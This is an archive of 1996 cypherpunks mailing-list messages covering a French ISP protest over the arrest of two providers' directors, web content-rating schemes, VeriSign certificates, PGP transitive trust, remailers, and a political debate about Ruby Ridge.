Affair:  Newsgroups/Pedophilia/Internet:  Two directors <translation?>

>                    Resume: "Nous demandons a l'ensemble des providers
>franÁais 
et des administrateurs des reseaux d'universites de fermer l'acces a tous les 
Newsgroups, afin que plus un seul Newsgroup ne soit            accessible du 
territoire franÁais, du moins tant que les fournisseurs
d'acces n'auront pas en France un statut clair".

Summary:  "We ask all French ISPs and administrators of University networks to 
close access to all Usenet newsgroups, such that no longer will even one single 
Newsgroup will be accessible from French territory, at least until French ISPs 
have a clear legal position within France."

>  Depuis 48h00 les deux dirigeants des societes FranceNet et
WorldNet sont en garde a vue pour avoir simplement fait leur metier
consistant a fournir l'acces a l'Internet...

Since about 48 hours, two directors of French companies, "FranceNet" and 
"WorldNet" are <translation?> for having simply done their job, consisting of 
providing access to the Internet...

> En effet, la Section de Recherches de Paris de la gendarmerie Nationale a
procede lundi a leurs arrestations et a la saisie de leurs materiels, pour
avoir diffuse au travers des Newsgroups des images pedophiles. 
Ces Newsgroups et les images qu'ils abritent, sont tous produits a
l'etranger et rapatries comme le font la plupart des fournisseurs d'acces
franÁais via les serveurs de News de Transpac, filiale de France Telecom.

The Research Section in Paris of the National Gendarmes started on Monday their 
arrests and seizures of equipment, for having distributed pedophile images 
through the Usenet newsgroups.  These Newsgroups and the images they contained 
(?) are all originated abroad and brought into France as is done by the
majority 
of French access providers via the News servers of Transpac, which is a 
subsidiary of France Telecom.

> Alors que la justice, dans une affaire similaire mais liee cette fois a des 
contenus racistes ou revisionnistes presents sur l'internet, ne s'est pas
encore 
prononces a l'encontre de neuf fournisseurs d'acces, alors que le ministere des 
Postes et des Telecommunication, au travers de son ministre FranÁois Fillon 
assurait encore recemment qu'en aucun cas les fournisseurs d'acces ne pouvaient 
Ítre tenus pour responsables des contenus qu'ils ne produisaient pas et qui 
circulaient sur l'internet, alors que le
lieutenant-colonel Browne, commandant la SR de Paris, reconnait lui
meme que les serveurs en question recevaient, stockaient et distribuaient
(tout comme Transpac) mais ne produisaient pas ces Newsgroups,
deux hommes, deux chefs d'entreprises sont aujourd'hui en prison
simplement parce que les autorites n'ont toujours rien compris a l'Internet
et a son fonctionnement.

The [French] courts, in a similar case but this time based on racist or 
revisionist contents present on the Internet, have not yet passed their 
judgement regarding nine ISPs, although the Ministry of Post and 
Telecommunications, through its minister Francois Fillon, stated again recently 
that in no case can access providers be held responsible for content that they 
do not produce and which circulates via the Internet, and although 
Lieutenant-Colonel Browne, commander of the Research Section in Pairs, admitted 
himself that the servers in question receive, store, and distribute (the
same as 
Transpac), but do not produce these Newsgroups, two men, two company directors, 
are today in prison simply because the authorities still haven't understood 
anything about the Internet and its functioning.

>La plupart des providers rapatrient de 6 a 8 000 Newsgroups chaque
jour, soit plusieurs centaines de milliers de messages, pouvant egalement
contenir des images. Parmi ces messages ils y a incontestablement des
contenus contraire a la loi franÁaise (sans doute moins de 5%), tout comme
il peut en circuler par la poste, ou dans les soutes a bagage d'Air France. Il 
est materiellement impossible pour un provider de controler l'ensemble du 
contenu des messages des Newsgroups, il lui est eventuellement possible
de supprimer l'acces a ceux dont le titre est de faÁon evidente contraire a
la loi (ex.alt.binaries.pedophilia...), ce qui n'empechera pas le lendemain de 
voir surgir un nouvel intitule pour remplacer le Newsgroup censure. 
Depuis plusieurs mois deja les membres de l'AFPI (Association des
Professionnels de l'Internet) dont FranceNet est l'un des fondateurs, ont
spontanement decide de supprimer l'acces a une vingtaine de Newsgroups
dont le simple libelle ne laissait aucun doute quant au caractere illegal de 
leurs contenus.

The majority of providers import from six to eight thousand Newsgroups each
day, 
therefore several hundred thousand messages, any of which could also contain 
images.  Among these messages there are incontestably some contents which are 
contrary to French law (no doubt less than 5%), just as they could circulate 
through the mails, or in the baggage holds of Air France.  It is materially 
impossible for a provider to check the contents of all Newsgroup messages;  it 
is possible to block access to those whose title is clearly contrary to the law 
(e.g. alt.binaries.pedophilia...), which wouldn't prevent the following day to 
see a new group appear to replace the censored one.  Since several months 
already, the members of the AFPI (Association of Internet Professionals), of 
which FranceNet is one of the founders, have spontaneously decided to suppress 
the access of about twenty Newsgroups whose title left no doubt as to the 
illegal character of their contents.

> Aujourd'hui ce sont les Newsgroups qui sont vises, demain ce sera sans
doute le tour du Web. Si les fournisseurs d'acces, qui nous ne le
repeterons jamais assez, ne sont que de simples transporteurs facilitant
l'acces a un reseau, peuvent Ítre emprisonnes, avec comme simple piece a
conviction un contenu produit au Canada ou en Australie, nous allons
assister purement et simplement a la mort de l'internet en France.

Today it is the Newsgroups which are wiped out, tomorrow it will be doubtless 
the Web's turn.  If access providers, which we can never emphasize enough, are 
but the simple transporters facilitating access to a network, can be
imprisoned, 
due to the singular cause of an item produced in Canada or in Australia, we are 
going to see, purely and simply, the death of the Internet in France.

>En signe d'indignation, de protestation et de solidarite envers nos confreres 
FranceNet et Worldnet, le fournisseur d'acces ImagiNet, egalement
membre fondateur de l'AFPI, a decide de fermer purement et simplement
l'acces a tous les Newsgroups. Nous demandons a l'ensemble des
providers franÁais et des administrateurs des reseaux d'universites d'en
faire autant afin que plus un seul Newsgroup ne soit accessible du territoire 
franÁais, du moins tant que les fournisseurs d'acces n'auront pas en France un 
statut clair.

As a symbol of indignation, of protest, and of solidarity with our brothers at 
FranceNet and WorldNet, the access provider ImagiNet, also a founding member of 
the AFPI, has decided to purely and simply close access to all newsgroups.  We 
ask all French ISPs and administrators of University networks to do the same, 
such that no longer will as much as a single Newsgroup will be accessible from 
French territory, at least until access providers in France have a clear legal 
status.

>Nous esperons sincerement que cet appel sera suivit par l'ensemble des
prestataires de connexion internet.

We sincerely hope that this call will be followed by all Internet access 
providers.

>Nous nous excusons aupres de nos abonnes pour la gene ainsi
occasionnee par une telle decision, mais nous savons que vous la
comprendrez et que la majorite d'entre vous nous soutiendrons dans cette
action.

We ask the understanding of our subscribers for the inconvenience caused by
such 
a decision, but we know that you will understand and that the majority of you 
support us in this action.

>          Patrick Robin
           President d'ImagiNet.
           robin@imaginet.fr
           Tel 43 38 10 24



<----  End Forwarded Message  ---->

Please feel free to forward this message to all appropriate venues.  "If we 
don't all hang together, we shall assuredly all hang separately."  ---Thomas 
Jefferson (?)

Gordon Peterson
http://www.computek.net/public/gep2/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 10 May 1996 22:41:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <9605100005.AA15315@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 PM 5/9/96 EDT, you wrote:
>        While that they aren't going for "this isn't appropriate" is to their
>credit, they do have a lot of problems with the nonsensical nature of some
>of their ratings; take a look at the definitions, for instance. (It's also
>obvious that they simply copied them from their ratings of video games. A lot
>of their HTML references for the definitions are messed up, incidentally.)

        I would agree the questions seem too video game orientated, and I
don't like some of the questions either. However, it is a fair effort, and I
don't think if something is questionable (for instance, someone errs by
labeling someone that is 18 years old as a teenager) the whole system falls
to pieces. Or some crucial piece of information on my home page, that some
child might have seen, but won't be seen because I labeled a character in
one of my stories as a teenager even if he/she was a teenager.
        I'm sure this is something that could go on for a very long time in
some cypherpunk thread (something I'm not interested in argueing about), but
there is no such thing as a perfectly objective or unbiased system. For
instance, I don't like the distinctions other systems make for
homosexuality, but I also understand some parents may wish to screen on it...

_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 07:55:42 +0800
To: reagle@mit.edu
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4IIX2U9TG8Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@mit.edu"  "Joseph M. Reagle Jr."  9-MAY-1996 20:02:59.66

>        I would agree the questions seem too video game orientated, and I
>don't like some of the questions either. However, it is a fair effort, and I

	I will also give them credit for a fair effort. However, it's one that
can stand a _lot_ of improvement... like all the rest.

>        I'm sure this is something that could go on for a very long time in
>some cypherpunk thread (something I'm not interested in argueing about), but
>there is no such thing as a perfectly objective or unbiased system. For

	I will be interested in seeing a response from the admin address I
cc'd it to.

>instance, I don't like the distinctions other systems make for
>homosexuality, but I also understand some parents may wish to screen on it...

	I understand why parents may wish to screen on it; I still disapprove
of giving them the ability to do so. Am I in favor of governmental or other
coercive suppression of systems that do so? No, not at all. But I still will do
my best to discourage them - such as by not rating or mis-rating pages.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 11 May 1996 05:30:22 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
Message-ID: <v02120d08adb8626c9ceb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:37 5/9/96, E. ALLEN SMITH wrote:
>From:   IN%"shamrock@netcom.com"  8-MAY-1996 11:06:21.74
>
>>Since VeriSign is going to issue certs for nyms for free, the only
>>requirement being uniqueness, using their certs might not prove much of a
>>problem.
>
>        I can see some fascinating legal questions with what, exactly, a
>VeriSign certificate obligates the company for. Digital signature laws should
>get interesting - any application of this to the Utah one?

VeriSign is going to offer four levels of certs. The first requires only
uniqueness. For the other three levels, VeriSign will require more and
better assurances of the correctness of True Name stated on the cert. I
don't know what form these assurances are supposed to take.

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 07:53:19 +0800
To: loki@obscura.com
Subject: Re: Remailer in a box
Message-ID: <01I4IJHU767U8Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@obscura.com"  "Lance Cottrell"  9-MAY-1996 20:11:17.14

>I don't know about posting the agreement. My lawyer may not want to see all 
>his hard work in the public domain. I will ask.

	Thanks.
	Incidentally, one thing that I noticed in your listing of services
was email to fax. In some circumstances (such as anonymous accounts), the other
way around would be useful. Even for a non-anonymous account, there have been
times when I've wished I could give someone a FAX number and have it emailed.
Admittedly, there is the problem of optical character recognition et al;
perhaps this could be handled via temporary web pages with a password emailed
to an account on the same system? Sameer may also want to look into this.
	I've seen some information about such systems on the net; one in
New York appears to include voicemail to email services, although I don't know
how as yet.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 08:47:51 +0800
To: vznuri@netcom.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4ILRRY69S8Y5AJT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri"  9-MAY-1996 21:07:58.36

>From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>

>>        I've figured out where my differences between myself and others
>>lay. The _only_ system and service that I am aware of that is distributing
>>PICS labels is RSAC. (http://www.rsac.org) They are what one could call an
>>objective and non-arbitrary content rating system rather than an
>>"appropriateness" system. 

	Actually, SafeSurf (of CyberAngels association - an indicator of
problems right then and there) is doing so also.

>now, it seems that the author might as well put the tags in his material
>himself instead of going through this submission process. furthermore

	I think they want the ability to track who's putting their ratings into
their web pages. They don't check very well, though; when I wanted to see what
the questionarre was like, I simply put in a fake email address (which could
have been a nym's address), a fake web page, and a pseudonym. Their user
agreement asks you to achnowledge a license giving them the right to examine
any web page to which you attach a rating; however, I don't see anything
preventing someone from simply duplicating it without going through the
system.

>also, JR, you say the system does not determine "appropriateness". 
>but in my view it does indirectly. an author can "falsify" his submission
>to say that his page has no sex or violence. (who is to say he is
>wrong? the internet ratings police?) this will implicitly determine
>the "appropriateness" of his page for people who screen their
>browswers based on the keywords that were affected.

	As I've stated above, they claim that they will check to see. The
SafeSurf page, as well as recruiting the CyberAngels to check, also claims that
	A. The "Internet community" will punish someone for fake ratings
	B. Anyone putting a too-low rating on a page with sexual content will
		be prosecuted (apparantly for "contributing to the delinquency
		of a minor" or some such nonsense)

>if there is a market-driven RSAC rating thing going on not described
>in the above article, I'd like to see it. but the above excerpt does
>not describe a market-driven system.

	No, it isn't. For a market-driven system to emerge, we're going to
have to have one or both of two things:
	A. Raters being paid by the people who post web pages. Not likely.
	B. Raters being paid by the people who get the ratings. More likely.
Neither the RSAC or SafeSurf systems does either of these.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 11 May 1996 09:17:22 +0800
To: Steve Reid <root@edmweb.com>
Subject: Re: Transitive trust
In-Reply-To: <Pine.BSF.3.91.960508152010.283A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.SUN.3.91.960509213411.632B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 May 1996, Steve Reid wrote:

> When you sign a key, you are placing your reputation on the line, so you 
> must be certain that the level of trust you're placing is appropriate. 
> But what happens when someone goes rogue and ignores credentials, and 
> signs keys of anyone who is willing to pay the price? You would regret 
> signing the rogue person's key. So, IT SHOULD BE POSSIBLE TO REVOKE 
> TRUST, in order to protect your own reputation.

> PGP currently only allows a person to revoke their own key. Most people 
> would revoke their key if it were stolen, to protect their own 
> reputation. However, some people may be unwilling or unable to revoke 
> their own key, and if you signed that key, your reputation may be 
> affected. Clearly, it should be possible to remove your signature from 
> someone's key.


But it is - it's a pain in the ass, but you can always revoke your own 
key and generate a new one, then sign everyone's keys whom you've signed 
as trusted, EXCEPT the one you wish to revoke.
 
> What it all comes down to is reputation. Protect your reputation, and 
> you could make a living on your reputation alone.

Ah, but first you have to build yourself a reputation before you can live
off it alone.  :) That includes doing cool things other than building
reputations by signing keys.


==========================================================================
 + ^ + |  Ray Arachelian |FH|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UE|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CC|What part of 'Congress shall make no |=\/|\/=
  /|\  |    Just Say     |KD|law abridging the freedom of speech' |==\|/==
 + v + | "No" to the NSA!|TA|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
Obscenity laws are the crutches of inarticulate motherfuckers-Fuck the CDA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 10:41:07 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 9 May 1996
Message-ID: <01I4IN4IEJBK8Y5AJT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  9-MAY-1996 22:01:14.77

>REGIONAL BELLS WANT RATE HIKES FOR WIRING SCHOOLS
>The United States Telephone Association would like to raise the average U.S.
>monthly phone bill by about $10 over the next five years to pay for wiring
>schools and libraries with new lines for phones and computers, and to
>subsidize poor and rural customers.  The proposal assumes an $11 billion
>cost for wiring schools and libraries, with local phone companies paying
>about a third to a half of that.  The rest would come from a surcharge on
>other services, such as cellular.  "No single industry should be held
>responsible for fulfilling this major goal," says USTA's president.  "Each
>has a role and should make a significant contribution to the national
>education technology mandate."  (Investor's Business Daily 8 May 96 A7)

	The "subsidize poor and rural customers" line makes me glad I don't
have a phone line.

>ALLIANCE SEEKS ELECTRONIC SECURITY
>An alliance of software companies has established the Electronic Licensing
>and Security Initiative to develop a system that uses electronic tokens
>linked to a software package to securely track software rentals, licenses
>and purchases.  The group also plans to develop an electronic clearinghouse
>to provide and track licenses.  Several major software producers, including
>Microsoft, IBM and AT&T have said they will support the Initiative's
>technology.  (Wall Street Journal 6 May 96 B6)

	Anyone know how this is supposed to work? It sounds like a
non-anonymous digital cash system, in essence.

>IBM'S INFOMARKET TOLL BOOTH
>IBM has persuaded some 30 companies, including Eastman Kodak, Xerox,
>Reuters, America Online and Yahoo!, to use its new infoMarket
>electronic-content clearinghouse for displaying and distributing their
>wares.  The infoMarket concept requires customers to pay for only what they
>use, with the content providers controlling the information and setting
>their own prices.  "Charging only for what you want is a very attractive
>scheme," says one electronic database provider.  The system is based on
>"Cryptolopes" -- secure electronic packaging that, when opened, bind the
>user to a contractual agreement regarding the use of the content.  If the
>content is distributed beyond that agreement, the technology can track its
>usage and bill the original purchaser for subsequent viewings.  "It's a
>complete break from all other ways information has been published on the Net
>to date," says an industry consultant.  "It turns pass-along from a business
>threat to a business opportunity."  (Business Week 13 May 96 p114)

	Again, it's not clear how this is supposed to work. It does remind me
of that information-network thing that was promoted on the Extropian lists,
except that didn't have any provisions on reuse.
	-Allen


>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Alfred North Whitehead (if your name is Alfred North Whitehead;  otherwise,
>substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu with the message: unsubscribe edupage.   (If you
>have subscription problems, send mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Sat, 11 May 1996 12:16:36 +0800
To: cypherpunks@toad.com
Subject: Re: Transitive trust and MLM
In-Reply-To: <+cmu.andrew.internet.cypherpunks+IlYDbnW00UfAI10=1K@andrew.cmu.edu>
Message-ID: <199605100209.TAA14299@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+IlYDbnW00UfAI10=1K@andrew.cmu.edu> Raph writes:
>   Now for the mathematical model. Signatures can bind keys to e-mail
>addresses, or act as assertions that the signed public key is trusted to
>transitively sign other keys. Let's assume that each signature has a
>certain probability p of being good, and a 1-p probability of being
>bogus, and that all probabilities are independent. These are probably
>bad assumptions in the real world, but that's the difference between
>theory and practice.

I'm not happy with the independence assumption.  Let's say I create a
keypair, put "president@whitehouse.gov" in the name field, and try to
get people to sign it as valid.  (I don't know what you're asserting
when you sign a key, but I'd say you're at least binding the key to
the name and address attached to it.)

Each signature has an /a priori/ probability p of correctly indicating
validity, but these probilities are not independent at all: this key
isn't valid, period.  If one certifying signature is incorrect, all
others on the same key must be, and vice versa -- about as correlated
as they come.

>   Now we can actually evaluate the probability of a given key being
>good. Consider a Monte Carlo process in which each edge in the graph is
>present with probability 1-p. For each run, we determine whether the
>recipient's public key (actually the binding between public key and
>recipient's e-mail address) is reachable from our trust root.
>The probability over a large number of runs is (given our assumptions) the 
>probability of the key being good.

There are two separate problems:
1) key reachability -- do I think I can trust this key?
2) key validity -- is this key really okay?

The graph reachability problem asks whether there exists a valid path.  
This is what you want for the key reachability problem.  But the key
validity problem should be asking whether all paths are valid; a
single invalid path to me (posing as the Prez, remember) means that I
get to read your mail to Bill (big deal, eh?).  So you'd need to turn
it around, and ask whether there exists an invalid path.  From your
use of "1-p" for the probability, you may have been thinking along
these lines already.

So an edge (u,v) in G indicates that u trusts v.  With probability 
q = 1-p, Mallet is able to fool v.  That is, Pr[(u,v) in G'] = q.
Then we ask whether there's a path from s to t in G' -- that is, from
you to the key you pulled off the net.  If one exists, you lose.  

To limit transitivity, constrain the path length.  This limits key
reachability too, but I think we agree that it's essential in the real
world.  (It should also make the math simpler!)  The model generalizes
to non-binary conceptions of trust, but I don't think these can
rehabilitate transitivity.  Hmm, there are some possible approaches,
though.

These probabilities q are somewhat dependent: if I'm smart about whom
I trust, all of the q_(me, v) values will be somewhat lower, and vice
versa.  I think they're mostly independent, though.  But this is an
improvised model; poke holes in it.

-- 
. Eli Brandt                                        usual disclaimers .
. eli+@cs.cmu.edu                                  PGP key on request .
. violation of 18 U.S.C. 1462:                                  "fuck".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 11 May 1996 05:49:43 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
Message-ID: <v02120d09adb880179541@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:10 5/9/96, E. ALLEN SMITH wrote:

>        The first level, in other words, is less of a certification than a PGP
>key with self-signature and signature from one other person. It doesn't have
>_any_ effort to verify that the email address stated on it is the actual email
>address of that nym. Or am I misinterpreting you?

I was on a panel with a representative from VeriSign at Interop in Las
Vegas. He said that uniqueness was the only requirement for the first level
of cert. I don't have any information beyond that.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 05:32:09 +0800
To: shamrock@netcom.com
Subject: Re: PGP, Inc.
Message-ID: <01I4IPAJCSGG8Y5AJT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"shamrock@netcom.com"  9-MAY-1996 23:02:01.67

>At 19:37 5/9/96, E. ALLEN SMITH wrote:
>>        I can see some fascinating legal questions with what, exactly, a
>>VeriSign certificate obligates the company for. Digital signature laws should
>>get interesting - any application of this to the Utah one?

>VeriSign is going to offer four levels of certs. The first requires only
>uniqueness. For the other three levels, VeriSign will require more and
>better assurances of the correctness of True Name stated on the cert. I
>don't know what form these assurances are supposed to take.

	The first level, in other words, is less of a certification than a PGP
key with self-signature and signature from one other person. It doesn't have
_any_ effort to verify that the email address stated on it is the actual email
address of that nym. Or am I misinterpreting you?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Sat, 11 May 1996 05:24:26 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Publicity on PICS
Message-ID: <9605100621.AA17939@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 PM 5/9/96 EDT, you wrote:
>        The following may give an example of how companies and governments want
>PICS to be used, instead of how it should be used (market-based ratings not
>for censorship).

        It is _very_ confusing to follow though.
>>CompuServe, Microsoft, Prodigy and Netscape Communications will soon give
>>their customers software enabling them to block access to material they
>>judge objectionable on the Internet's Worldwide Web.

        Consider that Compuserve had a deal with SurfWatch, which was
incorporated in it "Internet" in a box, with a lot of Spry goodies. Now
Surfwatch has been purchased by Spyglass (a competitor or Spry). Also,
Compuserve offers RSACi services through CyberPatrols RSACi compliance (got
some weird derivitive and cross-liscencing works going on here!) and urges
its users and 3rd party people to use RSACi...
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 11 May 1996 05:54:54 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer in a box
In-Reply-To: <01I4IIMHQ67Y8Y5BAX@mbcl.rutgers.edu>
Message-ID: <19960510033729.30653.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH writes:
 > 	I see your difficulty. It is an additional one with respect to
 > anonymous accounts. Hmm... you could put the burden on other ISPs by only
 > having anonymous accounts via telnet access - and not accepting such from
 > k12.edu domains. Bit of a limit, though.

1) New .edu registrations are restricted to colleges, but you have
   rogues like sidwell.edu (Chelsea's Quaker school), plus the odd
   17-year-old attending college like I did.

2) .k12.STATE.us is safe enough to restrict, except that some people
   are staff members who will be unhappy.  Of course, those people can
   just change their DNS so it responds to a PTR request with
   a.root-servers.net.  So naturally you don't let the students manage
   your servers (although frankly, the staff members have little time
   or knowledge to do it themselve; most would be happy to find a
   trustworthy student).  Even so, said smart student will discover
   that it's possible to spoof the DNS by spamming a client with
   responses.  That's particularly easy since the source of the packet
   will likely be the same subnet that the smart student.

You can't use the DNS for authentication of any type, particularly if
a Damoclean CDA is hanging over your head.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 08:11:16 +0800
To: tallpaul@pipeline.com
Subject: Re: Nazis on the Net
Message-ID: <01I4IYQTKD4K8Y5BI4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com"  1-MAY-1996 13:19:10.69

>I stand behind my original post and the analysis in it. 
 
>I am amused at the tremendous attempts by people with certain political
>affinities to bail out Weaver by a series of arguments based either on

	Actually, the political affinities seem rather to be on the other foot.
Every organization I know of that calls Weaver a racist, as opposed to a
separatist, also tries to deny exactly how wrongful the government's actions
were at Ruby Ridge. The biggest example of this is the US government, but
organizations such as the American Jewish Committee are also guilty of this
apologia. If you don't believe me on this (Rich, for instance, had doubted that
anyone was defending the actions at Ruby Ridge), I suggest reading "A Force
Upon the Plain", which is by the AJC's person on hate groups. In it, he calls
the actions of the USG at Ruby Ridge as, at worst, a mistake - and a more
justifiable mistake in his view than Weaver's not showing up for his court
hearing. In almost all cases in the chapter on Ruby Ridge, he states the
government's side of the story as fact, and uses quotes - prominently labelled
as from "white supremacists" - to describe the Weavers' side of the story.

>profound ignorance of political realities or with their own private
>dictionaries.

	If you believe that my definition of racism is out of my "own private
dictionary," I invite you to see Webster's Second College Edition New World
Dictionary of the English Language:

Racism. 1. Same as racialism (sense 1). 2. Any program or practice of racial
discrimination, segregation, persecution, and domination, based on racialism.

Racialism. 1. A doctrine or teaching, without scientific support, that claims
to find racial differences in character, intelligence, etcetera, that asserts
the superiority of one race over another or others, and that seeks to maintain
the supposed purity of a race or the races. 2. same as racism (sense 2).

	The second definition of racism is actually _more_ restrictive than
my definition. I call someone practicing "racial discrimination, segregation,
persecution, _and_ domination" a racist, whether or not they believe in some
superiority of some race. I do appreciate the inclusion in Webster's of
"without scientific support," since I am a scientist.
 
>The whole argument of racism vs. white separatism vs. white suppremicist
>seems more to come from people who argue whether someone is a Baptist or a
>Christian or a Southern Baptist or a Protestant. (In mathematical set
>theory one would trace the fallacy in thinking to the false idea that any
>given element of a set cannot be the element of more than one set. Thus, if
>(X is a member of Y) it cannot also be a member of Z.) 

	I regard racism and racial supremacism as two sides of the same thing.
Racial separatism overlaps with racism, but someone who practices one is not
necessarily in favor of the other. I do not dispute that someone who is a
racial separatist can also be a racist, and indeed often is. I simply am not
willing to condem someone as a racist when the only organizations calling him
such have clear motives to call what happened at Ruby Ridge something other
than premeditated murder.

>I understand that James D. is not accusing me of being a "child molester"
>but merely using it as a reductio ad adsurdem argument. 
 
>Let me continue in this vein. 
 
>The issue of  child molestation was dragged in and had no relevance on the
>immediate political isues of Weaver et al. 
 
>But imagine people are arguing about the deep fundamental differnces
>between someone who is a "child molester" vs. a "pedophile" vs. a "boy
>lover." 
 
	The analogy works quite well, in some ways. A pedophile who carries
out his (usually his) desires is a child molester. A boy lover may be a
pedophile, and may if a pedophile be a child molester. But I have known someone
who had sexual attractions to underage boys but controlled them - he regarded
carrying out such urges as wrong (I agree with him, if anyone is wondering).
I would not call him a child molester.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 11 May 1996 10:14:32 +0800
To: cypherpunks@toad.com
Subject: Are remailers designed to be knocked down?
Message-ID: <A92kx8m9L4fI085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Scientology wars are spilling over into alt.usenet.kooks again, and
Keith Henson had this odd thing to say.  I thought Cypherpunk discussion
of Keith's thesis would be interesting.


hkhenson@netcom.com (Keith Henson) wrote:

> henry (henri@netcom.com) wrote:

> : if the remailers are merely toys, capable of being knocked
> : down like dominoes by some fringe-cult of psychopathic dimwits,
> : it's better to find that out now than wait for a situation
> : where someone's life or death could be determined by the 
> : security of remailer-chaining and encryption against a 
> : determined opponent.
> 
> Ah, but the remailers are *designed* to be knocked down.  The
> are not expected to last if they are being used for serious 
> causes.  But the package for doing another one and getting it
> hooked into the network is easy to install--even in a user
> act.  Knocking out a remailer will usually halt the effort to
> get back at the person/persons who were spilling the beans.
> Social factors involved here.  If any of you would like to 
> help, offer to run a remailer for a while.  Consider it a 
> temporary civic duty.  Keith Henson
> 
> 

Alan Bostick               | "The thing is, I've got rhythm but I don't have
mailto:abostick@netcom.com | music, so I guess I could ask for a few more 
news:alt.grelb             | things." (overheard)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMZNwT+VevBgtmhnpAQGY2gMAsH/PpktUfimgjZ6zz/48hhAp0wra6BKb
